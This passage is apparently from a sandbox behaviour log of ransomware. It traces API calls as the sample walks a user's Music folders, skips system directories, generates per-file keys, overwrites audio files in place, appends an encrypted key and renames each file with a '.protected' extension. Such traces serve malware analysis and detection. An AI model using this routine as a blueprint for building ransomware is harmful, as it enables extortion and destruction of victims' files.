(lpString1="9_XPjfSRV64J4HD8ZUA.wav", lpString2="Program Files (x86)") returned -1 [0092.268] lstrcmpiW (lpString1="9_XPjfSRV64J4HD8ZUA.wav", lpString2="$Recycle.bin") returned 1 [0092.268] lstrcmpiW (lpString1="9_XPjfSRV64J4HD8ZUA.wav", lpString2="System Volume Information") 
returned -1 [0092.268] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav") returned 81 [0092.268] StrStrIW (lpFirst="9_XPjfSRV64J4HD8ZUA.wav", lpSrch=".protected") returned 0x0 [0092.268] lstrcmpW (lpString1="9_XPjfSRV64J4HD8ZUA.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.268] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.268] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\9_xpjfsrv64j4hd8zua.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.269] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav") returned 81 [0092.269] StrStrW (lpFirst="9_XPjfSRV64J4HD8ZUA.wav", lpSrch=".txt") returned 0x0 [0092.269] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav") returned 81 [0092.269] StrStrW (lpFirst="9_XPjfSRV64J4HD8ZUA.wav", lpSrch=".rar") returned 0x0 [0092.269] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav") returned 81 [0092.269] StrStrW (lpFirst="9_XPjfSRV64J4HD8ZUA.wav", lpSrch=".zip") returned 0x0 [0092.269] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.270] 
SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.270] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.270] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.270] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.271] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.271] CloseHandle (hObject=0xd4) returned 1 [0092.271] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav.protected") returned 91 [0092.271] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\9_xpjfsrv64j4hd8zua.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\9_xpjfsrv64j4hd8zua.wav.protected")) returned 1 [0092.272] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.272] lstrcmpiW (lpString1="J6s22iFW9.mp3", lpString2="Windows") returned -1 [0092.272] lstrcmpiW (lpString1="J6s22iFW9.mp3", lpString2="Program 
Files") returned -1 [0092.272] lstrcmpiW (lpString1="J6s22iFW9.mp3", lpString2="Program Files (x86)") returned -1 [0092.272] lstrcmpiW (lpString1="J6s22iFW9.mp3", lpString2="$Recycle.bin") returned 1 [0092.272] lstrcmpiW (lpString1="J6s22iFW9.mp3", lpString2="System Volume Information") returned -1 [0092.272] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3") returned 71 [0092.272] StrStrIW (lpFirst="J6s22iFW9.mp3", lpSrch=".protected") returned 0x0 [0092.272] lstrcmpW (lpString1="J6s22iFW9.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.272] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.272] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\j6s22ifw9.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3") returned 71 [0092.273] StrStrW (lpFirst="J6s22iFW9.mp3", lpSrch=".txt") returned 0x0 [0092.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3") returned 71 [0092.273] StrStrW (lpFirst="J6s22iFW9.mp3", lpSrch=".rar") returned 0x0 [0092.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3") returned 71 [0092.273] StrStrW (lpFirst="J6s22iFW9.mp3", lpSrch=".zip") returned 0x0 [0092.273] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2172, lpOverlapped=0x0) returned 1 [0092.273] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffde8e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.274] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2172, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2172, lpOverlapped=0x0) returned 1 [0092.274] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.274] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.274] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.274] CloseHandle (hObject=0xd4) returned 1 [0092.275] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3.protected") returned 81 [0092.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\j6s22ifw9.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\j6s22ifw9.mp3.protected")) returned 1 [0092.278] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.278] 
lstrcmpiW (lpString1="MPxby.mp3", lpString2="Windows") returned -1 [0092.278] lstrcmpiW (lpString1="MPxby.mp3", lpString2="Program Files") returned -1 [0092.278] lstrcmpiW (lpString1="MPxby.mp3", lpString2="Program Files (x86)") returned -1 [0092.278] lstrcmpiW (lpString1="MPxby.mp3", lpString2="$Recycle.bin") returned 1 [0092.278] lstrcmpiW (lpString1="MPxby.mp3", lpString2="System Volume Information") returned -1 [0092.278] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3") returned 67 [0092.278] StrStrIW (lpFirst="MPxby.mp3", lpSrch=".protected") returned 0x0 [0092.278] lstrcmpW (lpString1="MPxby.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.278] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.278] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\mpxby.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.279] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3") returned 67 [0092.279] StrStrW (lpFirst="MPxby.mp3", lpSrch=".txt") returned 0x0 [0092.279] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3") returned 67 [0092.279] StrStrW (lpFirst="MPxby.mp3", lpSrch=".rar") returned 0x0 [0092.279] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3") returned 67 [0092.279] StrStrW (lpFirst="MPxby.mp3", lpSrch=".zip") 
returned 0x0 [0092.279] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.279] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.279] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.280] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.280] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.280] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.280] CloseHandle (hObject=0xd4) returned 1 [0092.281] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3.protected") returned 77 [0092.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\mpxby.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\mpxby.mp3.protected")) returned 1 [0092.281] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: 
lpFindFileData=0x295ef20) returned 1 [0092.282] lstrcmpiW (lpString1="OqvzO1sqQ41zXf", lpString2="Windows") returned -1 [0092.282] lstrcmpiW (lpString1="OqvzO1sqQ41zXf", lpString2="Program Files") returned -1 [0092.282] lstrcmpiW (lpString1="OqvzO1sqQ41zXf", lpString2="Program Files (x86)") returned -1 [0092.282] lstrcmpiW (lpString1="OqvzO1sqQ41zXf", lpString2="$Recycle.bin") returned 1 [0092.282] lstrcmpiW (lpString1="OqvzO1sqQ41zXf", lpString2="System Volume Information") returned -1 [0092.282] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf") returned 72 [0092.282] lstrcmpW (lpString1="OqvzO1sqQ41zXf", lpString2=".") returned 1 [0092.282] lstrcmpW (lpString1="OqvzO1sqQ41zXf", lpString2="..") returned 1 [0092.282] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\*") returned 74 [0092.282] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0092.282] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.282] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.282] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.282] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.282] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.282] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\.") returned 74 [0092.282] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.282] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.282] 
lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.282] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.282] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.282] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.282] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.282] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\..") returned 75 [0092.282] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.283] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.283] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.283] lstrcmpiW (lpString1="7xBQXzq dcX.wav", lpString2="Windows") returned -1 [0092.283] lstrcmpiW (lpString1="7xBQXzq dcX.wav", lpString2="Program Files") returned -1 [0092.283] lstrcmpiW (lpString1="7xBQXzq dcX.wav", lpString2="Program Files (x86)") returned -1 [0092.283] lstrcmpiW (lpString1="7xBQXzq dcX.wav", lpString2="$Recycle.bin") returned 1 [0092.283] lstrcmpiW (lpString1="7xBQXzq dcX.wav", lpString2="System Volume Information") returned -1 [0092.283] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav") returned 88 [0092.283] StrStrIW (lpFirst="7xBQXzq dcX.wav", lpSrch=".protected") returned 0x0 [0092.283] lstrcmpW (lpString1="7xBQXzq dcX.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.283] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.283] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.283] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\7xbqxzq dcx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav") returned 88 [0092.283] StrStrW (lpFirst="7xBQXzq dcX.wav", lpSrch=".txt") returned 0x0 [0092.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav") returned 88 [0092.283] StrStrW (lpFirst="7xBQXzq dcX.wav", lpSrch=".rar") returned 0x0 [0092.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav") returned 88 [0092.283] StrStrW (lpFirst="7xBQXzq dcX.wav", lpSrch=".zip") returned 0x0 [0092.284] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2054, lpOverlapped=0x0) returned 1 [0092.284] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffdfac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.284] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2054, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2054, lpOverlapped=0x0) returned 1 [0092.284] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.284] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, 
lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.284] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.285] CloseHandle (hObject=0xd8) returned 1 [0092.285] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav.protected") returned 98 [0092.285] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\7xbqxzq dcx.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\7xbqxzq dcx.wav.protected")) returned 1 [0092.285] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.285] lstrcmpiW (lpString1="93AMr4.wav", lpString2="Windows") returned -1 [0092.285] lstrcmpiW (lpString1="93AMr4.wav", lpString2="Program Files") returned -1 [0092.286] lstrcmpiW (lpString1="93AMr4.wav", lpString2="Program Files (x86)") returned -1 [0092.286] lstrcmpiW (lpString1="93AMr4.wav", lpString2="$Recycle.bin") returned 1 [0092.286] lstrcmpiW (lpString1="93AMr4.wav", lpString2="System Volume Information") returned -1 [0092.286] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav") returned 83 [0092.286] StrStrIW (lpFirst="93AMr4.wav", lpSrch=".protected") returned 0x0 [0092.286] lstrcmpW (lpString1="93AMr4.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.286] 
CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.286] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.286] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\93amr4.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav") returned 83 [0092.286] StrStrW (lpFirst="93AMr4.wav", lpSrch=".txt") returned 0x0 [0092.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav") returned 83 [0092.286] StrStrW (lpFirst="93AMr4.wav", lpSrch=".rar") returned 0x0 [0092.286] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav") returned 83 [0092.286] StrStrW (lpFirst="93AMr4.wav", lpSrch=".zip") returned 0x0 [0092.286] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x126f, lpOverlapped=0x0) returned 1 [0092.287] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffed91, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.287] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x126f, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x126f, lpOverlapped=0x0) returned 1 [0092.287] SetFilePointerEx (in: hFile=0xd8, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.287] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.287] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.287] CloseHandle (hObject=0xd8) returned 1 [0092.287] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 